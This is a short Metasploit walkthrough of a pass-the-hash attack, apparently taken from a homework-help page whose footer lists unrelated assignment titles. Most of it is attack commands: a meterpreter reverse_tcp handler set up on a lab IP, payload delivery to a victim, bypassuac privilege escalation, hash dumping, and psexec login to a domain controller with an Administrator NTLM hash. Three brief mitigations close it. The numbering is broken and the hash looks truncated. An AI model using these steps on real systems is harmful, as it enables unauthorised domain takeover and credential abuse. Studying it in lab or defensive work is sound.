Pass The Hash Attack
1. Create a payload and deliver to victim machine.
b. Use exploit/multi/handler
c. Set Payload windows/meterpreter/reverse_tcp
d. Set LHOST 10.0.2.15
2. Download and run the payload on the victim machine.
3. Once the reverse tcp connection is established and then escalate the privileges on the victim
b. Search bypassuac
c. Use 4
d. Set SESSION 1
4. After exploiting get the system and dump the hash
5. Now run a nmap scan for the available port on the server.
6. Since smb port 445 is open we can run powershell exploit and get access to the AD server.
b. Search psexec
c. Use 11
d. Set RHOST 10.0.2.21
e. Set SMBDomain testdomain
f. Set SMBUser Administrator
g. Set SMBPass aad3b435b514eeaad3b435b51404ee:72f48f7cddfeaecd28166780f73
1. Use Privilege Access Management(PAM) for login using privileged account so the password hashes are not stored in the local machine.
2. Always the workstation should be configured to latest patches and also have an endpoint security agent.
3. Use strong authentication with short life span.
- 3 months ago
- Given any sequence, how can you determine if it is an arithmetic sequence
- Marketing case
- PHYSICS/ASTRONOMY MATH REQUIRED VERY EASY
- Criminology Individual Project 3 due in 8 hours frm now 3 pages/825 words 3 sources need a non plagiarized work
- SampleDataSet.xlsx: Identify three continuous and three discrete variables and describe their
- Vicarious liability of parents for crimes
- Business Process Modelling Blog Assessment
- CRJ 499 Assignment 5: Identifying the Challenge in Law Enforcement
- TAX EFFECT ON A BUSINESS ENTITY
- Computer Systems and Networks